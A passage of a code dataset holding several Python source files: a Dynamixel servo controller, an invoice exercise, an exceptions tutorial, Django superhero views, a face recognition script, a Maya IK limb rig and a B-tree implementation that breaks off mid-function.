36\nADDR_MX_MOVING_SPEED = 32\n\n# Protocol version\nPROTOCOL_VERSION = 
1.0 # See which protocol version is used in the Dynamixel\n\n# Default setting\nServo_Neck1_ID = 10 # Neck Joint Up and Down \nServo_Neck2_ID = 20 # Head Joint Left Right \nServo_S1R_ID = 30 # Shoulder Joint 1 Right\nServo_S2R_ID = 31 # Shoulder Joint 2 Right\nServo_E1R_ID = 32 # Elbow Joint 1 Right\nServo_E2R_ID = 33 # Elbow Joint 2 Right\nServo_S1L_ID = 40 # Shoulder Joint 1 Left\nServo_S2L_ID = 41 # Shoulder Joint 2 Left\nServo_E1L_ID = 42 # Elbow Joint 1 Left\nServo_E2L_ID = 43 # Elbow Joint 2 Left\n\n \nServos_Head = [Servo_Neck1_ID, Servo_Neck2_ID]\nServos_Left_Arm = [Servo_S1L_ID, Servo_S2L_ID, Servo_E1L_ID, Servo_E2L_ID]\nServos_Right_Arm = [Servo_S1R_ID, Servo_S2R_ID, Servo_E1R_ID, Servo_E2R_ID]\nServos_All = [Servo_Neck1_ID, Servo_Neck2_ID, Servo_S1R_ID, Servo_S2R_ID, Servo_E1R_ID, Servo_E2R_ID,\nServo_S1L_ID, Servo_S2L_ID, Servo_E1L_ID, Servo_E2L_ID]\n\nBAUDRATE = 1000000 # Dynamixel default baudrate : 57600\n#DEVICENAME = 'COM4' \nMoving_Speed = 0\nDEVICENAME = '/dev/ttyUSB0' # Check which port is being used on your controller\n # ex) Windows: \"COM1\" Linux: \"/dev/ttyUSB0\" Mac: \"/dev/tty.usbserial-*\"\n\nTORQUE_ENABLE = 1 # Value for enabling the torque\nTORQUE_DISABLE = 0 # Value for disabling the torque\nDXL_MINIMUM_POSITION_VALUE = 0 # Dynamixel will rotate between this value\nDXL_MAXIMUM_POSITION_VALUE = 1020 # and this value (note that the Dynamixel would not move when the position value is out of movable range. Check e-manual about the range of the Dynamixel you use.)\nDXL_MOVING_STATUS_THRESHOLD = 20 # Dynamixel moving status threshold\n\nindex = 0\ndxl_goal_position = [DXL_MINIMUM_POSITION_VALUE, DXL_MAXIMUM_POSITION_VALUE] # Goal position\n\n\n# Initialize PortHandler instance\n# Set the port path\n# Get methods and members of PortHandlerLinux or PortHandlerWindows\nportHandler = PortHandler(DEVICENAME)\n\n# Initialize PacketHandler instance\n# Set the protocol version\n# Get methods and members of Protocol1PacketHandler or Protocol2PacketHandler\npacketHandler = PacketHandler(PROTOCOL_VERSION)\n\n# Open port\nif portHandler.openPort():\n print(\"Succeeded to open the port\")\nelse:\n print(\"Failed to open the port\")\n print(\"Press any key to terminate...\")\n #getch()\n quit()\n\n\n# Set port baudrate\nif portHandler.setBaudRate(BAUDRATE):\n print(\"Succeeded to change the baudrate\")\nelse:\n print(\"Failed to change the baudrate\")\n print(\"Press any key to terminate...\")\n #getch()\n quit()\n\n# # Enable Dynamixel Torque for Left Right Servo to test connection\n# dxl_comm_result, dxl_error = packetHandler.write1ByteTxRx(portHandler, Servo_LeftRight_ID , ADDR_MX_TORQUE_ENABLE, TORQUE_ENABLE)\n# if dxl_comm_result != COMM_SUCCESS:\n# print(\"%s\" % packetHandler.getTxRxResult(dxl_comm_result))\n# elif dxl_error != 0:\n# print(\"%s\" % packetHandler.getRxPacketError(dxl_error))\n# else:\n# print(\"Dynamixel has been successfully connected\")\n\n\ndef Enable_Torque(Servo_ID):\n dxl_comm_result, dxl_error = packetHandler.write1ByteTxRx(portHandler, Servo_ID , ADDR_MX_TORQUE_ENABLE, TORQUE_ENABLE)\n if dxl_comm_result != COMM_SUCCESS:\n print(\"%s\" % packetHandler.getTxRxResult(dxl_comm_result))\n elif dxl_error != 0:\n print(\"%s\" % packetHandler.getRxPacketError(dxl_error))\n else:\n print(\"Torque has been enabled for Servo %d\" %Servo_ID)\n\ndef Disable_Torque(Servo_ID):\n dxl_comm_result, dxl_error = packetHandler.write1ByteTxRx(portHandler, Servo_ID, ADDR_MX_TORQUE_ENABLE, TORQUE_DISABLE)\n if dxl_comm_result != COMM_SUCCESS:\n print(\"%s\" % 
packetHandler.getTxRxResult(dxl_comm_result))\n    elif dxl_error != 0:\n        print(\"%s\" % packetHandler.getRxPacketError(dxl_error))\n    else:\n        print(\"Torque has been disabled for Servo %d\" %Servo_ID) \n\n\ndef Set_Speed(Servo_ID, Speed):\n    dxl_comm_result, dxl_error = packetHandler.write2ByteTxRx(portHandler, Servo_ID , ADDR_MX_MOVING_SPEED, Speed)\n    if dxl_comm_result != COMM_SUCCESS:\n        print(\"%s\" % packetHandler.getTxRxResult(dxl_comm_result))\n    elif dxl_error != 0:\n        print(\"%s\" % packetHandler.getRxPacketError(dxl_error))\n    else:\n        print(\"Dynamixel Speed has been successfully changed\")\n\ndef Set_GoalPosition (Servo_ID, GoalPosition):\n    dxl_comm_result, dxl_error = packetHandler.write2ByteTxRx(portHandler, Servo_ID, ADDR_MX_GOAL_POSITION, GoalPosition)\n    if dxl_comm_result != COMM_SUCCESS:\n        print(\"%s\" % packetHandler.getTxRxResult(dxl_comm_result))\n    elif dxl_error != 0:\n        print(\"%s\" % packetHandler.getRxPacketError(dxl_error))\n\ndef Get_Current_Pos(Servo_ID):\n    dxl_present_position, dxl_comm_result, dxl_error = packetHandler.read2ByteTxRx(portHandler, Servo_ID, ADDR_MX_PRESENT_POSITION)\n    if dxl_comm_result != COMM_SUCCESS:\n        print(\"%s\" % packetHandler.getTxRxResult(dxl_comm_result))\n    elif dxl_error != 0:\n        print(\"%s\" % packetHandler.getRxPacketError(dxl_error))\n    else:\n        return dxl_present_position  \n    \n\n# Read present Speed\ndef Get_Current_Speed(Servo_ID):\n    dxl_present_speed, dxl_comm_result, dxl_error = packetHandler.read2ByteTxRx(portHandler, Servo_ID, ADDR_MX_MOVING_SPEED)\n    if dxl_comm_result != COMM_SUCCESS:\n        print(\"%s\" % packetHandler.getTxRxResult(dxl_comm_result))    \n    elif dxl_error != 0:\n        print(\"%s\" % packetHandler.getRxPacketError(dxl_error))\n    else:    \n        return dxl_present_speed\n\n    \n    \n# print(\"Press any key to continue! 
(or press ESC to quit!)\")\n# # if getch() == chr(0x1b):\n#     break\n\n\n\ndef Close_Port():\n    # Close port\n    portHandler.closePort()\n","sub_path":"Python/Halloween19/backup/backup_main_control.py","file_name":"backup_main_control.py","file_ext":"py","file_size_in_byte":6975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"569201889","text":"def invoice(in_file):\r\n    try:\r\n        assert not in_file == ''\r\n    except AssertionError:\r\n        print('Blank file name detected!')\r\n        return False\r\n    with open(in_file) as inf:\r\n        values = inf.readline().split()  # Read the first line to get N and k values\r\n        n = int(values[0])\r\n        k = int(values[1])\r\n        all_invoices = list(range(n))  # Create a list of the invoice indexes 0..N-1\r\n        for line in inf:  # Read each line, and set the element at invoice# -1 to None\r\n            all_invoices[int(line)-1] = None\r\n\r\n    missing = 0\r\n    for i in all_invoices:  # If an item is None, then the invoice# index of that item + 1 was found\r\n        if i is not None:\r\n            print(i+1)\r\n            missing += 1\r\n    if missing != k:\r\n        print('There were fewer missing invoices found than specified!')\r\n\r\n\r\ninvoice('testdata.txt')\r\n","sub_path":"Week 4/missingInvoice/1A.py","file_name":"1A.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"491078990","text":"\"\"\"\nExceptions\nEven when a Python program is syntactically correct, errors can still occur while it runs. Errors detected during execution are called exceptions.\n\nMost exceptions are not handled by the program and show up as error messages like this:\n\n\"\"\"\n#10 * (1/0)\n\n\n\"\"\"\nException handling\n\nA try statement works as follows:\n\nFirst, the try clause (the statements between the try and except keywords) is executed.\nIf no exception occurs, the except clause is skipped and execution of the try statement is finished.\nIf an exception occurs during execution of the try clause, the rest of the clause is skipped. If the exception's type matches the name after except, the corresponding except clause is executed, and then execution continues after the try statement.\nIf an exception does not match any except clause, it is passed on to outer try statements.\nA try statement may contain more than one except clause, to handle different specific exceptions. At most one handler will be executed.\n\nHandlers only handle exceptions that occur in the corresponding try clause, not exceptions in other handlers of the same try statement.\n\nAn except clause may name multiple exceptions at once, placed in parentheses as a tuple, for example:\n\nexcept (RuntimeError, TypeError, NameError):\n    pass\nThe last except clause may omit the exception name, in which case it acts as a wildcard. You can use this to print an error message and then re-raise the exception.\n\"\"\"\nimport sys\n\ntry:\n    f = open('myfile.txt')\n    s = f.readline()\n    i = int(s.strip())\nexcept OSError as err:\n    print(\"OS error: {0}\".format(err))\nexcept ValueError:\n    print(\"Could not convert data to an integer.\")\nexcept:\n    print(\"Unexpected error:\", sys.exc_info()[0])\n    raise\n\n\n\"\"\"\nThe try ... except statement also has an optional else clause; when present, it must follow all except clauses. It runs when the try clause raises no exception. For example:\n\"\"\"\n\nfor arg in sys.argv[1:]:\n    try:\n        f = open(arg, 'r')\n    except IOError:\n        print('cannot open', arg)\n    else:\n        print(arg, 'has', len(f.readlines()), 'lines')\n        f.close()\n\"\"\"\nUsing the else clause is better than putting all the statements inside the try clause, because it avoids accidentally catching exceptions that the except clauses were not meant to handle.\n\nException handlers do not just handle exceptions that occur directly in the try clause, but also those raised inside functions called (even indirectly) from it. For example:\n\"\"\"\ndef this_fails():\n    x = 1/0\n\n\ntry:\n    this_fails()\nexcept ZeroDivisionError as err:\n    print('Handling run-time error:', err)\n\n\"\"\"\nHandling run-time error: int division or modulo by zero\n\"\"\"\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\"\"\"\nIn Python 3, an exception that carries arguments is handled as follows:\n\"\"\"\n\n# define a function\ndef temp_convert(var):\n    try:\n        return int(var)\n    except (ValueError) as Argument:\n        print (\"The argument does not contain numbers\\n\", Argument)\n\n# call the function\ntemp_convert(\"xyz\")\n","sub_path":"com/onyx/basic/17错误和异常.py","file_name":"17错误和异常.py","file_ext":"py","file_size_in_byte":2950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"329120813","text":"from django.shortcuts import render\nfrom django.http 
import HttpResponse, HttpResponseRedirect\nfrom django.urls import reverse\nfrom .models import Superhero\n\n# Create your views here.\n\n\ndef index(request):\n all_heroes = Superhero.objects.all()\n context = {\n 'all_heroes': all_heroes\n }\n return render(request, 'superhero/index.html', context)\n\ndef detail(request, hero_id):\n selected_hero = Superhero.objects.get(pk=hero_id)\n context = {\n \"selected_hero\": selected_hero\n }\n return render(request, 'superhero/detail.html', context)\n \n\ndef create(request):\n if request.method == \"POST\":\n name = request.POST.get('name')\n alter_ego_name = request.POST.get('alter_ego_name')\n primary_super_ability = request.POST.get('primary_super_ability')\n secondary_super_ability = request.POST.get('secondary_super_ability')\n catchphrase = request.POST.get('catchphrase')\n new_hero = Superhero(name=name, alter_ego_name=alter_ego_name, primary_super_ability=primary_super_ability, secondary_super_ability=secondary_super_ability, catchphrase=catchphrase)\n new_hero.save()\n return HttpResponseRedirect(reverse('superhero:index'))\n else:\n return render(request, 'superhero/create.html')\n\ndef edit(request, hero_id):\n selected_hero = Superhero.objects.get(pk=hero_id)\n if request.method == \"POST\":\n selected_hero.name = request.POST.get('name')\n selected_hero.alter_ego_name = request.POST.get('alter_ego_name')\n selected_hero.primary_super_ability = request.POST.get('primary_super_ability')\n selected_hero.secondary_super_ability = request.POST.get('secondary_super_ability')\n selected_hero.catchphrase = request.POST.get('catchphrase')\n selected_hero.save()\n context = {\n \"selected_hero\": selected_hero\n }\n return render(request, 'superhero/detail.html', context)\n else:\n context = {\n \"selected_hero\": selected_hero\n }\n return render(request, 'superhero/edit.html', context)\n\ndef delete(request, hero_id):\n selected_hero = Superhero.objects.get(pk=hero_id)\n if request.method == \"POST\":\n selected_hero.delete()\n return index(request)\n else:\n context = {\n \"selected_hero\": selected_hero\n }\n return render(request, 'superhero/delete.html', context)","sub_path":"superhero_creator/superhero/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"425453500","text":"import cv2\nimport face_recognition\nimport pickle\nimport time\n\nimage_file = './data/image/soccer_01.jpg'\nencoding_file = './data/encodings.pickle'\nunknown_name = 'Unknown'\nmodel_method = 'cnn'\n\n\ndef detectAndDisplay(frame):\n start_time = time.time()\n rgb = cv2.cvtColor(frame,cv2.COLOR_BGR2RGB)\n\n boxes = face_recognition.face_locations(rgb,model=model_method)\n encodings_1 = face_recognition.face_encodings(rgb,boxes)\n names = []\n for encoding in encodings_1:\n maches = face_recognition.compare_faces(data['encodings'],encoding)\n name = unknown_name\n if True in maches:\n machedindexs = [i for (i,b) in enumerate(maches) if b]\n counts = {}\n for i in machedindexs:\n name = data['names'][i]\n counts[name] = counts.get(name,0)+1\n name = max(counts,key=counts.get)\n names.append(name)\n for ((top,right,bottom,left),name) in zip(boxes,names):\n y= top -15 if top -15 >15 else top +15\n color = (0,255,0)\n line = 2\n if (name == unknown_name):\n color = (0,0,255)\n line = 1\n name = ''\n cv2.rectangle(frame,(left,top),(right,bottom),color,line)\n y = top - 15 if top - 15 > 15 else top + 15\n 
cv2.putText(frame,name,(left,y),cv2.FONT_HERSHEY_SIMPLEX,0.75,color,line)\n\n end_time = time.time()\n process_time = end_time - start_time\n print('process time',process_time)\n cv2.imshow('Recognition',frame)\n cv2.imwrite('./result/result_soccer_1.jpg',frame)\n\n\ndata = pickle.loads(open(encoding_file,'rb').read())\n\nimage = cv2.imread(image_file)\ndetectAndDisplay(image)\n\ncv2.waitKey(0)\ncv2.destroyAllWindows()","sub_path":"video_face_recognize/image_find_son.py","file_name":"image_find_son.py","file_ext":"py","file_size_in_byte":1706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"442939734","text":"#####################################################\n# base ik rp solver limb\n# this limb should do the ik rpSolver rig functions\n#####################################################\n## import\nimport maya.cmds as cmds\n## import libs\nimport namingAPI.naming as naming\nimport common.transforms as transforms\nimport common.attributes as attributes\nimport common.apiUtils as apiUtils\nimport riggingAPI.joints as joints\nimport riggingAPI.controls as controls\nimport modelingAPI.curves as curves\nimport riggingAPI.constraints as constraints\n\nimport riggingAPI.rigComponents.baseLimbs.baseJointsLimb as baseJointsLimb\n## import rig utils\nimport riggingAPI.rigComponents.rigUtils.createDriveJoints as createDriveJoints\nimport riggingAPI.rigComponents.rigUtils.addTwistJoints as addTwistJoints\n\n## kwarg class\nclass kwargsGenerator(baseJointsLimb.kwargsGenerator):\n\t\"\"\"docstring for kwargsGenerator\"\"\"\n\tdef __init__(self):\n\t\tsuper(kwargsGenerator, self).__init__()\n\t\tself.dKwargs = {'lBpCtrls': None}\n\t\tself.addKwargs()\n\nclass baseIkRPsolverLimb(baseJointsLimb.baseJointsLimb):\n\t\"\"\"docstring for baseIkRPsolverLimb\"\"\"\n\tdef __init__(self, *args, **kwargs):\n\t\tsuper(baseIkRPsolverLimb, self).__init__(*args, **kwargs)\n\t\tif args:\n\t\t\tself._getComponentInfo(args[0])\n\t\telse:\n\t\t\tself._lBpCtrls = kwargs.get('lBpCtrls', None)\n\n\tdef createComponent(self):\n\t\tsuper(baseIkRPsolverLimb, self).createComponent()\n\n\n\t\tsParent_ctrl = self._sComponentControls\n\n\t\t## put ik joint chain locally\n\t\tsGrp_ikJnts = transforms.createTransformNode(naming.oName(sType = 'group', sSide = self._sSide, sPart = '%sRPJointsLocal' %self._sName, iIndex = self._iIndex).sName, lLockHideAttrs = ['tx', 'ty', 'tz', 'rx', 'ry', 'rz', 'sx', 'sy', 'sz', 'v'], sParent = self._sComponentRigNodesWorld)\n\t\tsParent_jntLocal = sGrp_ikJnts\n\t\tlJntsLocal = []\n\n\t\tlJntsLocal, lBindJnts = createDriveJoints.createDriveJoints(self._lBpJnts, sParent = sGrp_ikJnts, sSuffix = 'IkRPLocal', bBind = False)\n\t\tlJnts, lBindJnts = createDriveJoints.createDriveJoints(self._lBpJnts, sParent = self._sComponentJoints, sSuffix = 'IkRP', bBind = self._bBind)\n\n\t\tfor i, sJntLocal in enumerate(lJntsLocal):\n\t\t\tfor sAxis in ['X', 'Y', 'Z']:\n\t\t\t\tcmds.connectAttr('%s.translate%s' %(sJntLocal, sAxis), '%s.translate%s' %(lJnts[i], sAxis))\n\t\t\t\tcmds.connectAttr('%s.rotate%s' %(sJntLocal, sAxis), '%s.rotate%s' %(lJnts[i], sAxis))\n\t\t\t\tcmds.connectAttr('%s.scale%s' %(sJntLocal, sAxis), '%s.scale%s' %(lJnts[i], sAxis))\n\n\t\t## ctrls\n\t\tlCtrls = []\n\t\tfor i, sBpCtrl in enumerate(self._lBpCtrls):\n\t\t\toJntName = naming.oName(sBpCtrl)\n\t\t\tiRotateOrder = cmds.getAttr('%s.ro' %sBpCtrl)\n\t\t\tif i != 2:\n\t\t\t\tlLockHideAttrs = ['rx', 'ry', 'rz', 'sx', 'sy', 'sz', 'v']\n\t\t\telse:\n\t\t\t\tlLockHideAttrs = 
self._lLockHideAttrs\n\t\t\toCtrl = controls.create(oJntName.sPart, sSide = oJntName.sSide, iIndex = oJntName.iIndex, iStacks = self._iStacks, bSub = True, sParent = self._sComponentControls, sPos = sBpCtrl, iRotateOrder = iRotateOrder, sShape = 'cube', fSize = 8, lLockHideAttrs = lLockHideAttrs)\n\t\t\tlCtrls.append(oCtrl.sName)\n\n\t\t## ik handle\n\t\tsIkHnd = naming.oName(sType = 'ikHandle', sSide = self._sSide, sPart = '%sRPsolver' %self._sName, iIndex = self._iIndex).sName\n\t\tcmds.ikHandle(sj = lJntsLocal[0], ee = lJntsLocal[-1], sol = 'ikRPsolver', name = sIkHnd)\n\n\t\t#### offset group\n\t\tsGrpIk = transforms.createTransformNode(naming.oName(sType = 'group', sSide = self._sSide, sPart = '%sRPsolver' %self._sName, iIndex = self._iIndex).sName, lLockHideAttrs = ['tx', 'ty', 'tz', 'rx', 'ry', 'rz', 'sx', 'sy', 'sz', 'v'], sParent = self._sComponentRigNodesWorld, sPos = lCtrls[-1])\n\t\tsGrpPv = transforms.createTransformNode(naming.oName(sType = 'group', sSide = self._sSide, sPart = '%sPV' %self._sName, iIndex = self._iIndex).sName, lLockHideAttrs = ['tx', 'ty', 'tz', 'rx', 'ry', 'rz', 'sx', 'sy', 'sz', 'v'], sParent = self._sComponentRigNodesWorld, sPos = lCtrls[1])\n\t\tcmds.parent(sIkHnd, sGrpIk)\n\n\t\t#### pole vector constraint\n\t\tcmds.poleVectorConstraint(sGrpPv, sIkHnd)\n\t\t#### pole vector line\n\t\tsCrv, lClsHnds = curves.createCurveLine(naming.oName(sType = 'curve', sSide = self._sSide, sPart = '%sPvLineIk' %self._sName, iIndex = self._iIndex).sName, [lJnts[1], lCtrls[1]], bConstraint = False)\n\t\tcmds.parent(lClsHnds, sCrv, self._sComponentControls)\n\n\t\t## pass info to class\n\t\tself._lJnts = lJnts\n\t\tself._lCtrls = lCtrls\n\t\tself._lBindJnts = lBindJnts\n\t\tself._sGrpIk = sGrpIk\n\t\tself._sIkHnd = sIkHnd\n\t\tself._lJntsLocal = lJntsLocal\n\t\tif lBindJnts:\n\t\t\tself._lBindRootJnts = [lBindJnts[0]]\n\t\telse:\n\t\t\tself._lBindRootJnts = None\n\n\t\t## matrix connect\n\t\tconstraints.matrixConnect(lCtrls[0], [lJntsLocal[0]], 'matrixOutputWorld',lSkipRotate = ['X', 'Y', 'Z'], lSkipScale = ['X', 'Y', 'Z'], bForce = True)\n\t\tconstraints.matrixConnect(lCtrls[1], [sGrpPv, lClsHnds[1]], 'matrixOutputWorld',lSkipRotate = ['X', 'Y', 'Z'], lSkipScale = ['X', 'Y', 'Z'], bForce = True)\n\t\tconstraints.matrixConnect(lCtrls[2], [sGrpIk], 'matrixOutputWorld', lSkipScale = ['X', 'Y', 'Z'], bForce = True)\n\t\tsMultMatrixPv = cmds.createNode('multMatrix', name = naming.oName(sType = 'multMatrix', sSide = self._sSide, sPart = '%sPvMatrix' %self._sName, iIndex = self._iIndex).sName)\n\t\tcmds.connectAttr('%s.matrix' %lJnts[1], '%s.matrixIn[0]' %sMultMatrixPv)\n\t\tcmds.connectAttr('%s.matrix' %lJnts[0], '%s.matrixIn[1]' %sMultMatrixPv)\n\t\tconstraints.matrixConnect(sMultMatrixPv, [lClsHnds[0]], 'matrixSum', lSkipRotate = ['X', 'Y', 'Z'], lSkipScale = ['X', 'Y', 'Z'], bForce = True)\n\n\t\t## write component info\n\t\tself._writeGeneralComponentInfo('baseIkRPsolverLimb', lJnts, lCtrls, lBindJnts, self._lBindRootJnts)\n\n\t\t## output matrix\n\t\tif self._bInfo:\n\t\t\tself._writeOutputMatrixInfo(lJnts)\n\n\t\t## add twist joints\n\t\taddTwistJoints.twistJointsForLimb(self._iTwistJntNum, self._lSkipTwist, lJnts, self._lBpJnts, bBind = self._bBind, sNode = self._sComponentMaster, bInfo = self._bInfo)\n\n\t\tself._getComponentInfo(self._sComponentMaster)\n\n\tdef _getComponentInfo(self, sComponent):\n\t\tsuper(baseIkRPsolverLimb, self)._getComponentInfo(sComponent)\n\t\tself.rootCtrl = self._lCtrls[0]\n\t\tself.pvCtrl = self._lCtrls[1]\n\t\tself.ikCtrl = 
self._lCtrls[2]","sub_path":"maya/riggingAPI/rigComponents/baseLimbs/baseIkRPsolverLimb.py","file_name":"baseIkRPsolverLimb.py","file_ext":"py","file_size_in_byte":6111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"396586648","text":"#Jastejpal Soora\r\n\r\n#Node class\r\nclass Node:\r\n    def __init__(self, leaf = False):\r\n        self.keys = [None]*3 #array containing maximum of 3 keys\r\n        self.children = [None]*4 #array containing maximum of 4 child pointers\r\n        self.leaf = leaf #tracks whether this node is a leaf\r\n        self.num = 0 #number of keys\r\n\r\n    #Function that returns index of key in b tree\r\n    def findKey(self, key):\r\n        i = 0\r\n        while i < self.num and self.keys[i] < key:\r\n            i += 1\r\n\r\n        return i\r\n    \r\n    #Function to remove a key from tree\r\n    def remove(self, key):\r\n        i = self.findKey(key)\r\n\r\n        if i < self.num and self.keys[i] == key:\r\n            if self.leaf:\r\n                self.removeFromLeaf(i)\r\n            else:\r\n                self.removeFromNonLeaf(i)\r\n\r\n        else:\r\n            if self.leaf: \r\n                print(\"Key not in tree\")\r\n                return\r\n\r\n            #checks if subtree contains key to be removed\r\n            if i == self.num:\r\n                containsKey = True\r\n            else:\r\n                containsKey = False\r\n\r\n            #if child where key is present has less than two keys, child is filled\r\n            if self.children[i].num < 2:\r\n                self.fill(i)\r\n\r\n            if containsKey and i > self.num:\r\n                self.children[i-1].remove(key)\r\n\r\n            else:\r\n                self.children[i].remove(key)\r\n\r\n        return\r\n\r\n    #Function to remove a key from a leaf node\r\n    def removeFromLeaf(self, i):\r\n        #loop shifts all keys after index one position back\r\n        for i in range(i+1, self.num, 1):\r\n            self.keys[i-1] = self.keys[i]\r\n\r\n        self.num -= 1\r\n        return\r\n\r\n    #Function to remove a key from a non leaf node\r\n    def removeFromNonLeaf(self, i):\r\n        key = self.keys[i] #get key at index i\r\n\r\n        if self.children[i].num >= 2:\r\n            pre = self.getPre(i)\r\n            self.keys[i] = pre\r\n            self.children[i].remove(pre)\r\n\r\n        elif self.children[i+1].num >= 2:\r\n            suc = self.getSuc(i)\r\n            self.keys[i] = suc\r\n            self.children[i+1].remove(suc)\r\n\r\n        #if both children have less than 2 keys, then merge and remove\r\n        else:\r\n            self.merge(i)\r\n            self.children[i].remove(key)\r\n\r\n        return\r\n\r\n    #Function to get predecessor of key at index i\r\n    def getPre(self, i):\r\n        current = self.children[i]\r\n\r\n        while not current.leaf:\r\n            current = current.children[current.num]\r\n\r\n        return current.keys[current.num-1] #return the last key in leaf\r\n\r\n    #Function to get successor of key at index i\r\n    def getSuc(self, i):\r\n        current = self.children[i+1]\r\n\r\n        while not current.leaf:\r\n            current = current.children[0]\r\n\r\n        return current.keys[0] #return the successor\r\n\r\n    #Function to fill child at index that has fewer than 2 keys\r\n    def fill(self, i):\r\n        #borrow key from left sibling\r\n        if i != 0 and self.children[i-1].num >= 2:\r\n            self.takeFromLeft(i)\r\n\r\n        #borrow key from right sibling\r\n        elif i != self.num and self.children[i+1].num >= 2:\r\n            self.takeFromRight(i)\r\n\r\n        #merge if left or right child does not have enough keys\r\n        else:\r\n            if i != self.num:\r\n                self.merge(i)\r\n            else:\r\n                self.merge(i-1)\r\n\r\n        return\r\n\r\n    #Function to borrow key from left sibling\r\n    def takeFromLeft(self, i):\r\n        for n in range(self.children[i].num-1, -1, -1):\r\n            self.children[i].keys[n+1] = self.children[i].keys[n]\r\n\r\n        if not self.children[i].leaf:\r\n            for j in range(self.children[i].num, -1, -1):\r\n                self.children[i].children[j+1] = 
self.children[i].children[j]\r\n\r\n        self.children[i].keys[0] = self.keys[i-1]\r\n\r\n        if not self.children[i].leaf:\r\n            self.children[i].children[0] = self.children[i-1].children[self.children[i-1].num]\r\n\r\n        self.keys[i-1] = self.children[i-1].keys[self.children[i-1].num-1]\r\n\r\n        self.children[i].num += 1\r\n        self.children[i-1].num -= 1\r\n\r\n        return\r\n    \r\n    #Function to borrow key from right sibling\r\n    def takeFromRight(self, i):\r\n        self.children[i].keys[self.children[i].num] = self.keys[i]\r\n\r\n        if not self.children[i].leaf:\r\n            self.children[i].children[self.children[i].num+1] = self.children[i+1].children[0]\r\n\r\n        self.keys[i] = self.children[i+1].keys[0]\r\n\r\n        for n in range(1,self.children[i+1].num, 1):\r\n            self.children[i+1].keys[n-1] = self.children[i+1].keys[n]\r\n\r\n        if not self.children[i+1].leaf:\r\n            for j in range(1, self.children[i+1].num+1, 1):\r\n                self.children[i+1].children[j-1] = self.children[i+1].children[j]\r\n\r\n        self.children[i].num += 1\r\n        self.children[i+1].num -= 1\r\n        \r\n        return\r\n\r\n    #Function to merge child with right sibling\r\n    def merge(self, i):\r\n        self.children[i].keys[1] = self.keys[i]\r\n        \r\n        #keys are copied from right sibling into current child\r\n        for n in range(self.children[i+1].num):\r\n            self.children[i].keys[n+2] = self.children[i+1].keys[n]\r\n\r\n        #children are copied from right sibling into grandchildren\r\n        if not self.children[i].leaf:\r\n            for j in range(self.children[i+1].num +1):\r\n                self.children[i].children[j+2] = self.children[i+1].children[j]\r\n        \r\n        #keys that come after index are shifted one position back\r\n        for k in range(i+1, self.num + 1, 1):\r\n            self.keys[k-1] = self.keys[k]\r\n\r\n        #child pointers are moved one position back\r\n        for m in range(i+2, self.num + 1, 1):\r\n            self.children[m-1] = self.children[m]\r\n        \r\n        #key counts are updated\r\n        self.children[i].num += self.children[i+1].num + 1\r\n        self.num -= 1\r\n        \r\n        #right sibling is deleted\r\n        del self.children[i+1]\r\n        \r\n        return\r\n\r\n    #Function to insert a key into current node when it has vacancy\r\n    def insertVacant(self, key):\r\n        i = self.num-1 \r\n\r\n        #if it is a leaf node, find location to insert key\r\n        if self.leaf:\r\n            while i >= 0 and self.keys[i] > key:\r\n                self.keys[i+1] = self.keys[i]\r\n                i -= 1\r\n\r\n            #key is inserted and count is updated\r\n            self.keys[i+1] = key\r\n            self.num += 1\r\n\r\n        else:\r\n            while i >= 0 and self.keys[i] > key:\r\n                i -= 1\r\n\r\n            #split child if full\r\n            if self.children[i+1].num == 3: \r\n                self.split(i+1, self.children[i+1]) \r\n            \r\n                #after a split, decide which of the two new children gets the key\r\n                if self.keys[i+1] < key:\r\n                    i += 1\r\n\r\n            #insert key into vacant child\r\n            self.children[i+1].insertVacant(key)\r\n\r\n    #Function to split child of a node that is full\r\n    def split(self, i, node):\r\n        z = Node(node.leaf)\r\n        z.num = 1\r\n\r\n        #copy the last key into the new node (use n, not i, so the child index is not clobbered)\r\n        for n in range(1):\r\n            z.keys[n] = node.keys[n+2]\r\n        \r\n        if not node.leaf:\r\n            for j in range(2):\r\n                z.children[j] = node.children[j+2]\r\n        \r\n        node.num = 1\r\n        \r\n        #create space for new child\r\n        for k in range(self.num, i, -1):\r\n            self.children[k+1] = self.children[k]\r\n        \r\n        self.children[i+1] = z\r\n        \r\n        for m in range(self.num-1, i-1, -1):\r\n            self.keys[m+1] = self.keys[m]\r\n\r\n        self.keys[i] = node.keys[1]\r\n        self.num += 1\r\n    \r\n    #Function to traverse the tree\r\n    def traverse(self):\r\n        for i in range(self.num):\r\n            if self.leaf == False:\r\n                self.children[i].traverse()\r\n\r\n            #parent is printed\r\n            print(self.keys[i]) \r\n        \r\n        #visit the rightmost child after the last key\r\n        if self.leaf == False:\r\n            self.children[self.num].traverse()\r\n\r\n#B tree 
class\r\nclass B_Tree:\r\n def __init__(self): \r\n self.root = None\r\n \r\n #Function to insert \r\n def insert(self, key):\r\n if self.root is None: #if tree is empty\r\n self.root = Node(True) #create new b tree leaf node\r\n self.root.keys[0] = key #insert value into first position\r\n self.root.num = 1 #key count is updated\r\n \r\n else: #if tree is not empty\r\n if self.root.num == 3: #if root is full\r\n new = Node(False) #create a new node\r\n new.children[0] = self.root \r\n new.split(0, self.root) \r\n\r\n i = 0\r\n \r\n if new.keys[0] < key:\r\n i += 1\r\n \r\n new.children[i].insertVacant(key) #new value is inserted into child\r\n self.root = new #root is set to new node\r\n \r\n else: #if root is not full \r\n self.root.insertVacant(key)\r\n\r\n #Function to delete\r\n def delete(self, key):\r\n self.root.remove(key)\r\n\r\n if self.root.num == 0:\r\n #temp = self.root\r\n \r\n if(self.root.leaf):\r\n self.root = None\r\n \r\n else:\r\n self.root = self.root.children[0]\r\n \r\n #del temp #free the previous root\r\n \r\n return\r\n\r\n #Function to get number of nodes in tree\r\n def size(self, node):\r\n count = 1\r\n\r\n #base case\r\n if node is None: \r\n return 0\r\n \r\n 